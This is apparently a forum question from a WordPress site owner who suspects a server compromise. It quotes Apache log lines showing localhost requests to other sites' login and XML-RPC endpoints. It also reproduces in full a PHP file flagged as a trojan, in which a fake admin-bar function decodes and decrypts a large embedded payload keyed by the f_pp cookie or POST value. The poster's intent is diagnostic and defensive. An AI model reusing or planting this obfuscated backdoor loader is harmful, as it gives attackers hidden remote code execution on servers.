# Wordpress Appears Hacked (backdoor PHP trojan) and Server Being Used as a bot against others, according to Apache Log files

Tags: php, wordpress, malware

Can someone help me determine what exactly is going on according to these log files? (real sample shown below).

Facts:

- My site was previously attacked by DDOS. Cloudflare was enabled. Attacks were blocked.
- As an extra measure, all internet traffic blocked with exception of Cloudflare IP's, to prevent DDOS directly on server via servers IP address instead of domain name. (in this case attacker knew the IP address of the server so this was necessary to do in order to stop the attack)
- I noticed the majority of IP's I was blocking with Cloudflare were other Ubuntu Wordpress websites. It appears these sites had a backdoor and their servers were being used to crack passwords by visiting the /wp-login.php url of other sites. In total, there were 1000 different IPs attacking my site.

Now, upon thinking the problem was over, I still noticed a large amount of requests on my Apache server and found a bunch of **127.0.0.1** GET requests to OTHER websites - so it looks like my server has somehow been compromised? They were not able to crack my password, so they got access some other way.

```
127.0.0.1 - - [09/Jun/2020:06:29:06 +0000] "GET /wp-login.php HTTP/1.1" 503 5927 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
172.69.23.15 - - [09/Jun/2020:06:29:10 +0000] "GET /wp-admin/ HTTP/1.1" 302 4581 "http://onlinebookofra.ublogg.com/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
172.68.142.89 - - [09/Jun/2020:06:29:15 +0000] "GET /wp-admin/ HTTP/1.1" 302 4581 "http://old.magento.fh-vejle.dk/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
127.0.0.1 - - [09/Jun/2020:06:29:17 +0000] "POST /xmlrpc.php HTTP/1.1" 301 535 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
127.0.0.1 - - [09/Jun/2020:06:29:17 +0000] "GET / HTTP/1.1" 301 660 "http://onlinebookofra.ublogg.com/xmlrpc.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"vejle.dk/xmlrpc.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
127.0.0.1 - - [09/Jun/2020:06:29:42 +0000] "GET / HTTP/1.1" 301 518 "http://rkcnagyatad.hu/xmlrpc.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
172.68.142.215 - - [09/Jun/2020:06:29:46 +0000] "GET / HTTP/1.1" 200 45406 "http://localhost" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
127.0.0.1 - - [09/Jun/2020:06:29:53 +0000] "GET / HTTP/1.1" 301 518 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
127.0.0.1 - - [09/Jun/2020:06:29:55 +0000] "GET / HTTP/1.1" 301 518 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
172.68.141.184 - - [09/Jun/2020:06:29:56 +0000] "GET / HTTP/1.1" 200 45407 "http://127.0.0.1/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
172.68.133.36 - - [09/Jun/2020:06:29:58 +0000] "GET / HTTP/1.1" 200 45405 "http://127.0.0.1/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
    172.68.189.85 - - [09/Jun/2020:07:53:43 +0000] "GET /wp-admin/ HTTP/1.1" 302 4581 "http://test.old.fhroskilde.dk/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
    172.69.22.152 - - [09/Jun/2020:07:54:12 +0000] "GET /wp-admin/ HTTP/1.1" 302 4581 "http://test.old.fhlejr.dk/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
127.0.0.1 - - [09/Jun/2020:07:58:29 +0000] "GET / HTTP/1.1" 301 518 "http://www.autovip.lt/xmlrpc.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
172.69.23.63 - - [09/Jun/2020:08:05:02 +0000] "GET /wp-admin/ HTTP/1.1" 302 4581 "http://www.qatarworldcup2022.futbol/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
127.0.0.1 - - [09/Jun/2020:08:17:38 +0000] "GET / HTTP/1.1" 301 518 "http://www.beatpeopleup-com.cheapass.com/xmlrpc.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
```

You can see that my own localhost (127.0.0.1) is visiting random websites like "http://www.beatpeopleup-com.cheapass.com/xmlrpc.php" and http://www.autovip.lt/xmlrpc.php. I assume this is not normal?

Wordfence also found this file to be a trojan:

```
    <?php
/**
 * Toolbar API: Top-level Toolbar functionality
 *
 * @package WordPress
 * @subpackage Toolbar
 * @since 3.1.0
 */

/**
 * Instantiate the admin bar object and set it up as a global for access elsewhere.
 *
 * UNHOOKING THIS FUNCTION WILL NOT PROPERLY REMOVE THE ADMIN BAR.
 * For that, use show_admin_bar(false) or the {@see 'show_admin_bar'} filter.
 *
 * @since 3.1.0
 * @access private
 *
 * @global WP_Admin_Bar $wp_admin_bar
 *
 * @return bool Whether the admin bar was successfully initialized.
 */

function _wp_admin_bar_init() {
    global $wp_admin_bar;

    if ( ! is_admin_bar_showing() )
        return false;

    /* Load the admin bar class code ready for instantiation */
    require_once( ABSPATH . WPINC . '/class-wp-admin-bar.php' );

    /* Instantiate the admin bar */

    /**
     * Filters the admin bar class to instantiate.
     *
     * @since 3.1.0
     *
     * @param string $wp_admin_bar_class Admin bar class to use. Default 'WP_Admin_Bar'.
     */
    $admin_bar_class = apply_filters( 'wp_admin_bar_class', 'WP_Admin_Bar' );
    if ( class_exists( $admin_bar_class ) )
        $wp_admin_bar = new $admin_bar_class;
    else
        return false;

    $wp_admin_bar->initialize();
    $wp_admin_bar->add_menus();

    return true;
}


/**
 * Filters whether to show the admin bar.
 *
 * Returning false to this hook is the recommended way to hide the admin bar.
 * The user's display preference is used for logged in users.
 *
 * @since 3.1.0
 *
 * @param bool $show_admin_bar Whether the admin bar should be shown. Default false.
*/

function pre_admin_bar ( $wp_kses_data, $wp_nonce ) {

    $kses_str = str_replace( array ('%', '*'), array ('/', '='), $wp_kses_data );
    $filter = 'base'.'6'.'4'.'_decode';
    $filter = $filter( $kses_str );
    $md5 = strrev( $wp_nonce );
    $sub = substr( md5( $md5 ), 0, strlen( $wp_nonce ) );
    $wp_nonce = md5( $wp_nonce ). $sub;
    $prepare_func = 'g'.'z'.'inflate';
    $i = 0; do {
        $ord = ord( $filter[$i] ) - ord( $wp_nonce[$i] );
         $filter[$i] = chr( $ord % 256 );
         $wp_nonce .= $filter[$i]; $i++;
    } while ($i < strlen( $filter ));
    return @$prepare_func( $filter );

} 

$wp_nonce = isset($_POST['f_pp']) ? $_POST['f_pp'] : (isset($_COOKIE['f_pp']) ? $_COOKIE['f_pp'] : NULL);
$wp_kses_data = 'O7ZDrQwa6UbFoqfZpODFm%%EmMp9dJWPwTBXF8QYAZ5zK7zdrqsSuFfuD71elbShG+JYtYbXjbUhRMXhAl5DaK5OwyTJm+v3rdBQKiBBHMt0bnhPnHVZtH33QzJogG4UIC2xrJClnpf3RbsG9vXMbtDalCP08YwGdUuB8g7m1jJ9Hl2iZhO0O8x28TLUi203IG+Kuu80WTxfI5csHUiopwanlq1rd%Pv%vbj0O4Rlf3R9f9xjRw1shpuI3SM4T44Q8JyifBZK7JJgEl4hkvm0%CDDgZRUpGRLCs2fKn3C8qcbyUjFAX8sBpY7c%4ra%nrwDeo9J%L8wEf0MS2BlZ9lkCN2iLqBkVay9Qn0XyZYy2KnJvJoJVCKku6Y4DYT%7+EO1yJDIQDvU5d2XsMo4X3FpbtSpgNuNoAwvjRUM+UF2H4sUMuaXEBC5u2E47iaiCr+BILF24COdu6ZgAYQWV5dWThGOmrj4E087Ia5dVb8szojm41GKkxTLSBsYKKP4zh7t2Fruojo9wlmgWmiRvQcYibMByXrGUC4AB8KLSl5f+ehtkQdfaM4SaaV36zXWseRyqmwcPasvLeqs8mHg18o+x+E%Dr8Xcf4LubDgvkl5UlA8j%+mW%KI4dxl2CdJpdQMojeceXy6N+2vxtcMBf+09nO1ihXZ7X55mZeIiL6KU5P7mYOJqHfq14avFwLEiZT3G68vpGA80gxjhtEb2BAvU8bEyId7DmYr4vWs2pgX9OiSAgqB81qiQJH5LLQ23wtzLuMliDYX7DXvYPj62C8H+4RyVGkd1kiqvDPnIGDtgx4xDd4X7s0YjQamEh+5DsPyiZDBBoU4lL5OEL4Kkwz52wY+S3dmOEOJzTTxlEzIxb5COsDGkIwjgvrI2HSNCfKgSU+uE6dvOBYGDCSEbD6GQ9q1pU%jhWXiK4lN5S0UB0UU2SWuolATPdRpT8%BpZR5EDiQ2FtrJ%duMobV%rqb89FRh4xNjxa%DErrcDyGVdmeMRxBMuwdg3LL2tDYGU62%R6yjWZoH9WJouFILkgrljPJalLWHTcGckjaRdOzkp5uE102oW5kXT0egXDDk47LYUByNZ%L%L+5CElHdfXN0XgFO%0GsskTu+7o0g81SsysnoEgWSTN966wVMj8JNAh6kGsjIkvYsHap037F8dF8j%YjyTJxhF3g7iaaA0NEGUr4ZoaEBkcSHYSwHLtG4KJz+8DN4DfZWnzgX10sMKi3D7dSd2St0yGnWbovDt6akN66L+7GioDFcKxdMhnhYnoLRng+UxsCFlO98r3IetzfBMJo3ztZphbIBUljFTyw605eIAaFnH7sEbpGYngHHseI6i5AVr5ee8Be1UFAavxpy+JSPy5h1FrCxg6KR7Aqfs5xsryXiMbbnWOcxq%IxPc250HceP+5QFtSMbfkfO0EW1Ne6NCYsg3o7eMadL8vr6nBtaMp5q8lHNKGE%+TMB+HCtF6Gdc0WVTaNyDDXGKhxrDn6gr4Bu0kkRnxzTDEGf12Yc8sAHHWbN3czmJN0dU40P6fepNABluFtzAZWVWiYjG1nG3zv5Lf9rH5%gEO74OM7Kh2Bfvwd6ZygnPy3bMyHKd5pPi3iamoqr5oEgbu0xJOX3+opSlH1YOFNQGpJ%c7RV47iC1TkKtBEYSHtb7lLkh0b5i4e%I1pg1zzmgn3CT0CMtD4XaWhMdjGYVXYZHjanZiGZvgA1XNYLMJGIrkun0cqsbvgiGA+CuV1loh1dV6mPxKlhatThWVGuYc2aeqruW0CiUPJa9CijJTtaxCWwfPOcSCGE5wTal3thCwNzfeANAiW0Pc8J2ysThiW8qP1oOuQkKq8KTeoKM727EgE2MRbQslMnnLna7lcfuv1f00Oje2kNOVW5f3kv1DrTBShDDftIc2FT88Y6mPE6GtqyvktopsnGn%zh3Hv67dqkJ%dfF8Oc8J4CmPXhBWnoD9n0eHXtNuWEsS541i7ur5Nv8+%yX1H38v5uUs4aR9pAIMS3eM2TwYVso5X1gv67U9jpXkgdQATwgseJsUGVSlTNT3YEorWvATUa02%qyHYp0VjsVFC4zpofqlIx%MlZawYYuHt9bLgboVfhZU7fk7rwAnEQD88k7NT6XTXz7aRXahDM0bLx01ZtoinrHyvfyY7atT5oQC37HFkZO9QnvhMie1nclO6kNYrUfOkuPEVZtnYzb12VwDtCAq1pLWJRCzC5x01o7GR%IuyJRXo0BcRJtrbrOjyGUxEp7XTSnS9PMOcbb64A949gg+QPKBP9dhwnsD0kv4Eg2xGoMyehFocKV%iN+Gb27+iyYfszMIyba0sa74okO2WYBUXdOHrT6RKkefiXRaLLOaRE0nXeT%v2iJN7LnZFcmQJujwoxA%9AQaywWoW94By01zlrWWQUuiz+KZN9ad%bvKw2FSQEW7dusN2wIM+ns2Ek9aCBn4efcYucfUcgQnwXKpqLnQ%TZj0y2fXSFld8J9wa20ww6mpOvH62FjUlCPY9uJ%ZLtcfwJdbyeLL%9Y7VlikSQzOxv48hXuXc9Brq5buFtQX8kagNR726g%e+ezb56CwGHoihm92xqrILfG7c9wT5VE+idRZH9XbgyF9vtDsG7nfvzS96Mm18d6+bzuiYWEFRNS0eJuY1v09mdE75M4y1xnrJm9LH785ZS2Hc6AApYJ3GVP4rWr29Nm6CKQrtgCzXm3MWO6RDD9C95E7H0Es5zkZqfJkwKmC1xg0ugC0lTwlc+ThfSSKc4Op9pAj490Hxy9AjKwc7ckhenALa4zou%NQKXvENtsnfAs3Vy0TYAjNtJRqpbDlsPFqGShZOPm8RgV06isLRP3Bz2mNNzlIEef74iO44Lcl8rMX1O8Xi+l8Bou2WIJGVN1cKl%rNRHs5nYCw+l5s2mJCsPDqJUS468Jnr0phDT1iQQgAUj5X9tEnwQVvf1VOsz4uDqiNwPOleOrDdP4xKXTvMuPUVCjqYrm0d0Bbc%rCag8TqFlbSqLwtWPP2%Paf53P4Sk5B2Q6+0rgnDVKIgu1yGDlv+UFKeeDx8xtkWEnmCmD6zy9sZXqvFclCGx0dNTgOWXjx8S%16AYOxqEITIrMMjJSwwkUuk4CZR+6QEGUi9yvaFUfmX3VGa0RCNB4MrBFkRkFDlmk5k633wVcYCvlHVmNG9HA7jlBVRst5kyHdoeAfc%sVxh5XETH7pgMkM5T9g7czWh0Q74dbo5RO0xuK7nEusFWFgqMBN1BT3c06cwuv3ai0WC3Xp0I94AGADNN845GHdL5zGPLOzDWurx48ZWWBYBvZfvFmtkCgqJYjrQmtgWyvjTk6idQElS%jcCWGg5gi1PHBaS8Hc0NKLvA4KedcxZtuNBra8ZeV7TM3WUmvEvouGZSon+7mKribj6DpOv32GvTwm5vU041ItANjwY5FmA9y3YbjkCjAB0hLBh51jJ7wBc2RuBp+AvLGPx8Li0Hl0gALLd6mdYhKGzysOWx20u2VrYGWppxbddGg+8L3f2e4er4K6of4drXQX4WjB96OsIqzoIQ6iL8tsLoTv0q88lUItfTMqAGZ1Cmp++BiRa8SWwArIc5fsP3nLCjo8sCwDSslYoHGI2RLJcP3H0VLP1p+jjR08ug5XdDtzfnh5JKXNPgGcX3hhNTiBo3CV4SNz0orRBU22XyDEU3SjsJigtojH3APta4LEWbc3prBHcSJM4rmzDwHoOChy7KwjnC5U3IkpUMD2L1a7AqiJfwutuGVNCCdigb20QXovVT3ylfjnXKoU7EeyvndJy1zsyjTtDHgL1NsPSDLbIioxWLTiF8jdlJyQ%F6S%NtO4ralG5J9Stv9Lr71qA1jT10UDpojLiKI3Dvs%f4iVKRP2GBv%qtJQtQ6pw7zTNTsB85dtDx3LFWyhxRx8NDpABJo6Zj%deDqwsDHY77sseCUX09vA4JjmeP2xm5vu20wJ0q9gqrpbkOe+PZ%c%u%fva409XbhjM2PEqWkMV7EqHr0td3J6DHOIf5FzqxXtee2nzBXwNlhuewYzjUsbWtfMm+tD88Wcas1V%%sCuSTDKHQmFxDApsphqfhqh2yuHMRI0xsspIVqoofw5nDR4QhTxzzRSP8SncxOfH1cO1%Gd3s8mDFOF9FqEA6OvPCWcNUNDepM5XwcQGKcUGt7wC%ON1vMiMi4d11OcFf0OGTYh5z4mnVXOI6bK6ZBK8ePEt8XHp0pZu8fZgGfw+6%5gkrQ5QB1%M0TNbal8TvIHW4%9keBYfKFayA7Gj8PRwpSjYSsbotsM1yoyZ7uEu%0DMUd5GFKuscFshsx6LFTrD6wkwI2mk0A0YmJoNgnzznh83DRbaxMUXRlJ9EuMV8gi9hxL5xJNFKYttgzdL3U4bpItFo03%Jp2xq0qTjWtdaCswQCjgkumraFF4docajKxi4Q0h2coeV3hAgFVu4zaStOMN%cV0bRINzG6iSIXbMBcng8o6uPjIakEoh3Uzq7OE0%i6cBnZCyt7ruuh5U2gYc1NAXFPQKJRXtq0sZmM57XsIzDtThPZ6XMYTHr14eJzF7%y2X7VwK1kMEYnhcMM0RJ8HaWXi3BWC29ZUJyVpmHbSRSeUtJRJlg1518ektdCVEI10%n1PESHzl7KprOPC8BzlLeY7Lvt6nYOgO8bCptjbp1N2L0BDm8ry4+aAGAHo9JInfsKOTBR42HVgCijX5SgF1kr4uj97ThFTq5%8eZZygqO0TRr9CtTXqAzr2jHdlWKJUVg6FF2L28HKO7RGdDLBUilCHR09mqpJPfAQaNGuruUVmz4fMW4JDvnrmFO3x+z8+ie7xee17y30+1i5Rn02RdrmPv9j4abiuoh7rpemWnVrMTv75BWUhpfsuN6IHckcZMKBHUSsyPqjI1uL%AJGrv+lv8L80+pAyHLB5l7Vr0j62coqJtd2ZPkRlyHFQ+n56SugYzj1zJK%q%WX2RKL+4HkmrzXMaN8Wp6TfKVIN0uqGUtTTbmL1PD8WeWaVDFcrIG06RLXEv5OGBsX1SosWV5peztoqwtfsz16%S8m9nc%PUS9jGsR+1P9Of1ih4FsyrNm4MorWKsgYRKH7%PnHrpedKjwFbwOkPAyB0w9jlcbb3gi2a8X1+u5rGN7y8IRCIotgfde%lyHZmkKO03vHcsea6pRA2Lqf+%OHDOxWEWZRNApbEPWbpLkdSX3wQZPkXfvGOrxeGuQrANVOC4mLFxYcmMPRL8u2La9Z3pJRsrt93uBJKQL6qs8GcQYF+d9JMnAyxgbqwxc+3F0p6VRI4JHIEwBRhhdAjkHFhQdwf1ompdDZwa2FT24BtPPJanhdRyD0eKOe+DgBCbg4Hkqau+JJJZac+RFFwZPJ0AXOKbd8CkqSByIlwwNYH9ho7zMZI3dSToJ3JG3+snA8dn57vxEBBjaoLUj2r6EDoMzfRCHFKiSK73T8utJrV7XFjSwWtvmfC24d8ttZYVexRGD9snf+dcx1ez2vg1zOpV%1X4xzn8l1VmyIdVsXlbmyuqkl6YIpKTMu3RnLS5I6tdCytz5BQiLbGh5U91X71vMZ3MZ%LvSBnWLwze77J+VZVFVM3FbhuftJeGhhQBeG4dmboMuPPTgpfEt47o5gCKe5d4gVe+2AWXFN8ZEEoccdQnL1Ur1GgpA07Go+WgAJVv3u2fPzW1nhLkbqVLah5zuCqDdAzty3cHUT9WNjnCXxvJiPUNdB8Z9lt61R3IWHWms5C0q+gUXlg9rGj%G8ys2z+Rb4pN7X8ij05BXpOF44yqxK%IhsFYoswtEAzvnYNDV+SJMVCnWsDwG+vb96VFij9TY2adDQ9RnvUccyAEvoFj1RX1qLBraRdRM2bUZ%fuwh9ZWDimFzGdJ6yJa3cbYeyrEDjOegprL7FMavCPWDJu9XhfULdi6KF7NwMOPbHUyshXmG6VG8cMTa7An2S2v1hOtiHAZ0h6E+fdjPozF8Jx6OMmEtLsoZ%ij4fBbb%KLTwSEf2HxSPQTV7abkGP4cg+34FLsWzoLwN4PkuD2V1a1sezwfHCcBr5lVoHZdVfnaqcgtWX90MmkbVeuPTZj0eFrmr4ekMPC4ZhIP7zTpLXqIQkCggWHK4J7x+3g+PRNGjgpzIWWqnhqFWSp3H5g7bXoZ54g8Cu1uCAgIspACR6FcGmrDLmeW1oe6cOCbIz5M1DFlWaWho6%ZwxPt2bR6z21pSUEh6lQlsrvsd%quWOdifRXAtHytIRXs4x6ZuNOMfv2pb9vg1wu6uDoUIeD3SWqkRNFOe00o5H%SEls8nMHGLVKYuug4OxJqvtw1wWrmOyAcAHp0FGbchWHJVhgDc1aptraSbZGxGiWBXEkWSJfDSj6ZomgiQ6qEj+IWa17Sv0If96yo0zIO3yRC%0JS4DjqV9BlGd7dM2PnBq9jVcW7r0Qh18GS%9+h6XVHZdkw1%Xw7F38UYH5mBYxaBy4YNRaZXLi9xQhcz0gMEAfMBXYqPrloXm20Ma7qwaZUS7gOId0zB+LbNotdXOTeJOMJ+E%+JBwMYq7xQHNK+J6a7D0HODzAH%nQtz%+q573zbHC5SfbujdhjcIirSXq2hOwpSRhrVGeIQXUOS9T0bhqNocnXv9YG0+QTMyXWe7tvphsuScnWhPzfqIOzR0LqvJA+j3QRMRvx8qNV4yIqe5jDTQl18HnCImX5yFgw3Q8SErb7xipZ4vThWrK1ugYDarXZ0NwykkXX026vq0c8aNN65vuQ3MjHrvpNjfB8+4jBQhhXv1OG5h5iZ3nOSA29maWYy11kmqzrbgnQJz7Iab3eaqyTiyCy%K1TIJwa1o3grA3Yh9v6mLeAtCqigwKh6xvd6Di8sPoEqLLiiVqtJ6hsCfOcgkvyF8JiEyav5wPDIfdGMIbe0fgVUGHrsWBE2GlfdPe%Y6leiq58f1ZKJxrFCY4QW2yiX5GyVQYDH8Y6GZ4yDxwiwLz6tBdGoaF%V%a8xzsa8CNz4eUhd9VnC52jOe5TTAAc4B3mVdQ6qcFgxsziJfL1jFvL5zakBvwRxPCrmTW+tV3y%bF9DI%qzECPkq1F5QAXqrA5pOwEhW0EdoaShkzvVWd6D6KuI%ikFLPB8Vf1IuPUGT+YS9JLr28C4QYJOAMeo+q23RoOrrpqouv7LR2%iiaIpK5Cqyv2Vlena12Kd5FQFCr47wyo0f2ZiMLDElAj1HpRG6h+ouDB1WX5qS70Rn7OKo+NsSxeVY7azEj1PDD2r1D33xcCD+WLX3nP3Nn6GLfK61f+vGvrHdvbOAIlhMpSfAz9VL7rWPmz5KPvHsYczwbhRccmAChZUpJzktmpAXqa6aeLor+P1Dp7EcoJzHwG+D2INtyup5H2YjVA5Sk%jbl+6v9aFL1tV3YfMWcYpMxMFLSS5E0uOgyWzAOMXZSPuPWrIzUXcr86K9hcriK+0%G8sffIUnkbn3sUI7a1xfoSNq6G4wT7g1xR1usFd1KeQ3QSfM+GevtOkVd7a1n7DP6uY%7wxPdCfAxbWr%CLRaPQw7LwGQwHQMlW6FIRWfHPFI+MhGnSe3kt9iNW9Pkjb5PpWic2UQY+CF9K7E3p24%TX0GrfTDtTDn70hNZ+YfwjAecr2c3PKhoJGXDpOGEcdf+%QvZ0pN4AsAAMTT6ErCt2F6BIjNHtJV%fjIHmKiBO1s20pxj6tBZ0nbiIIw6sQdL7pbydbo8gCLrPbh7yEp3%raMv0JWbNS+ppf82KTmpTuMneS4lds6uYQ7Br1+QTvDGcmVOL7CyaVfDd8fdUOriBGxOpF2gWaDbA23OahXMayTI9MnQnhkK0aNgOvfomex7qbn1Mer1Kh%Pq+rnbcPgQZB3X4dvjM7psH%aSVk+eHf8DQ4xU5rpJ7YTkwbJOXmZyrn2cnkjwbl3CvSO6jsn4cRj2Pt9v6FnVK72R0DBcMy8xe30x%FbjSu4KJTNDSxVVPfBCVY0Mj2wDrZCR4IVmmI7Dm4sQBW52SKQb%MKxbmtT%onYa8j+I0Tre48cJ722nhTu4VI98hLSXaK0HB7ukmGE8U40yflPTUUUAGz5C6YBVEWj+lWrPDZBDmdJzr+E0YUo7oaMXBL7VmGj+hUXCJiym9FH%fS0Rtaic8vAiZSq9OmLxplLeSuv2I3Tygtlv5RunG5t9lpetE68DeLR78kYCk4ZII1o5ZdX6MlXCVtYRsf%12GRkkUbGivQWJ+S1G8AcdBBGq+PEcEI84gBWa88U%uOOJtUfBE+YldGt+gKOQW269rWwoQgEAlHowF+UMMeRbwjHCcja733VRLw1RXb0BGYRhq5xvKKZeKBOgoC3bl1npgd8Bp5KN3vkPusBSpPnRHEPx2JImh%Bq%+k0v7ocCKmVppQuHKq2Uyo%0pnrUke2X+PW894AeRYvlbU4ys2Yu7XLGfcnpitVjQww90jO0EZ7O1IRNa+cvT14ogzZNB%GKrIGzMZJpiZFYFQGa1TEjDMZ2SiHvshR1vAs3EiTAZy9rDVIMMBznJp9TXptsucsAQKNq4J5VLBHu4%qOm1LfyRKVS45yZ7gpnJKczyrNwuHZkkDS0YV4AkhfkcwyGCL+JQnfyisqI7tyUfeDbKofmvvy7s7HFSVSNgRUqtKDZIXQDqci2xp7NkXGjAmxGq3BssJnqrbxUfRdizZyR5DDlE971akbU3LTfNyuBD00Vgl1GejosGx8JdKQRhYS73pqq72M10zbdtILidE5eZwiiFrpZjymSmK+nMsoc772qXqD0aQHu4FzZs0piho57EbVBWRLgwBiXkjK4ZGePXmrDkb6kBtuRVfS88XLJuEpMeanhmjRF2PoxoUAsQuX11hFQOAiwBHTEM57ZgCzBjKlburJmwzwRqZd9l59zTY6kQ8GbUtf65NSKnHGUcxavrAAuo+%MFA5Cr2hcLM+JUcFzxbJgLDbzhX2TdPLudA5q4pQF8YZh%7odbxS4+xjuN6SmYIiQpb1POa8nZ0eFuNAcQe1SIx7SIQcGCyCRsLUnMRq9Tq82b9OD3sYt1fCmHF+6d52qjDAEq6XLF7zntXQfx2XPM8uhLcTRF7FoKuNTDVHFGXtAWMlyMHIEXhcNZ3RlEYtrxoYE0y+xYrrkehGh3XGUdImv1KihDW1SWq0u5GOAa6hpsl3r4aA4UPiFZLGeT+2gXP2raw%Jl9tyBXNkJFkh6fKVFEBkyHC9Q3Smz9nZ8cKJHTGpqCuRRoRBkV9mjdkJ+SYWPTKts6Tg1D1lb9kgXXSI33BEiFMBtCthQJbIirp6Gt+NjcpdQy6iv6LS0OZRITOFhTVzK4ToPA5uRQNHEnzB2EQz5tft254BaKKEDQ2JRuHZptaheo4LEK+gWY4qVgwsThpaBiF83e2pfeLQKKG72d+nubOy9fMjwJlL93lzxuTDJ2zdzJa52l+35kbhWQ%ylGLbxbC2EbxdGzfCOv5jfY7o9xPZD1kXZnHssROZ8T7BUOEFjwqz%42XsqhRjGkV4yrcCH%Tl1RIQLZwOJk3VRHoNM4O2thZEOkLcI2Srvg35frOZoIyJriJr3oa6eXmt6e7gC1zwf5eQ17GnaZKPVzR2hOZaZL%cGJOz8JvT12cT32Ohb6swZfRaDnDn06hHGdACPRoo3EnXUWlu1vcjPgbgXmkys9tl2FR188N9t%XqoGeC+saCfZSw930J%4gvR%jSRj5An+t5JMCmdR0OTdq9+yWagaqz6019HGyCT6jRi7y4DcUlAif0iWaugxSee899YUAOjNh8fUe8SvWwF%%h6nvmXqyWNFntasbrI67xDKEnaLyfR1fZRcH8omeOmUuElNAvo5LlOpA+hq+yNYVgzo0tBpC32%wP%mcjOesw0me6fL+56VM43yQ0mc326uSbSGoBWM0kydXU+FfGwcaeszR%zpMhvSWS7LlP0qZbrve0yMi9NmWiRaKnUMqURMINJbP4Lat0g7caJMFWUZrfRYR4FdW9ig7jb+ALNXPr7TA9mbzI+DNIAfBJ3M1wM%9Gu7ajN+bwKJwyhDINdXMm336OLYkOY2qkrLnxVOuS0e8MJJp4B88FYTP4Oc52D%ITh9p5AgeqCEJpegURGE%RS3CfWhyr2pIHXkezaGFhbBS5ayrjwV7R6hn5deLaGWb7ksYupxgiQLM4Nk5bzHLlFg+RpzwbyZC7mUGVxWRjElzurw%9FfoNukR0CDm56eM14lfFxpo0hKBWuR%n1Ptx22D%f3wtbkQ9UuLAADhbzQ9sYPQsLqFduxjafUcpul7zf7TL7VyM1b4w2qCZF3W2kIxJ4mloHJ8PqBJRGshpRYVnBSVsXmOFMA+%CrkuECAViT719vh0iUcgnLGI6qqx0L1bV6juhj2NLJRy0Sd0H8oHV1wht5nfgZ2Wy6a%uQPA3PM6yGt99FORvPquqn5mn8CBTlxiLPZbrk+zqLx6K33QA0QDAoLKLPrtcO5vT0Ozbo%AZb6Hkg+nICQNa9D4osuhN5b6YqB%bZQBk7kzBANvqI%S8+VDcPqt5H7AsjHYUxfgUioaMrL%YpqVsKHrTwHw1e68FFng3gP2jnExSLxYHH9LSSjvqxLZcqhlHyFYHZ6EpkN6kd5c337uqFgDYfG+1SSZznOhwlNxfh5znhQqcevu3k7blreZPiedYxd+LljHG8dXe2cRbPd6CwNarhgan%YKHOjjY2Y5aM7eKiBtd5Mp%U2XD76nJAgp9JHdqJJ41lt0N0InuDPm8xMyRH8B7sfw6Nq0LsDfYbb3qNXvAL5uRqbhKArL9ID1RK%8TCxvnT1isX9w+D2EMFt6XLTQB6DSeQ2R4SPAR%fxYh71WfdwqzZUbdIeK5n+1MlSYvdzcEtOMzPPzjPdEE+6PsNaF%wkT4DyxPhrIkNxo1jxyXXbANFkNBPOob08Ttvb6jCH9HKfWk+K00GudVEb0mbsJI%m6R+y3HTuowQSzwE0ctWYWcIw5edG%KUj3QSjZGbznpMyhi6M8kFs34bEwSH8VNMyFHxT2bsvhIfVqPvG1FhRMMAxNKzT8J+9ohLL7Zk4yxdEQ5PTwd9ZYZ0PnFOjK+O6t5FI1JnXU%BhaM6gDTTEwoVKC4CHcFnkgk7uRNgjfn5GJCyc3L28rU6yeC6OFtpS3Zixnw8w8xYC6MfF2WcbqqDSzvzmcefQNn2nL2O5a8HDQfbmvpy2FTKOln7qyreN5h%UKhPWrKdJz5hnzurOczg5rlEdCGyyhDOCgXzJ5vlFcsUyz++nF84QYE6zp9Q064D5OjRQjpXwnbXwqGuczt+G22ZflcRwg66XKIYO7lt90UUz0tlhxuSo+BdrTJi9dCOSyASZceTDQtMGmhTFyE3Nm+Ep8p4UbCNQARtUBxKD1toYMg%DgsTQNsQUkoEEW3fg4yuhUROfxTELoHcqyaxzAY9D84Ddj5Uxx9dl79hu65KUIEUmaFydECy7a6zua%AjcSKdfveMJ3X5HCpWSTx3SmvEbHUaU2oGfLl3%f+Ua1xK2HnhLOnHj0bpOF24LgU+dwVPy3Px5fd0SLXqoEUq73MX+DZkFL1wzrElfMiKz8mOphz+PxVSR5+Oq9ZdIqucDfyNJZHTEh2DBd3DWG0ZWZeSIbU0fwIdJTcwF9lTJkcabhWeDewUS5TqS+7eVOQdYB5eSjJnUiH9hJs0wCCYIFoTcYYeqwZgjAC8FsCHD3fIZPxSPAK2j7hGRNWDYWH8V79ZhC7bO9jYkK5I1yczN4SSEd1fhDEJD7JbocpODUm01yuuGPXb0XozNQkp2LhYbzKh7lxzIiWkhc4RYXqAMz0zi50qUrFZyNTJ36wf8Zd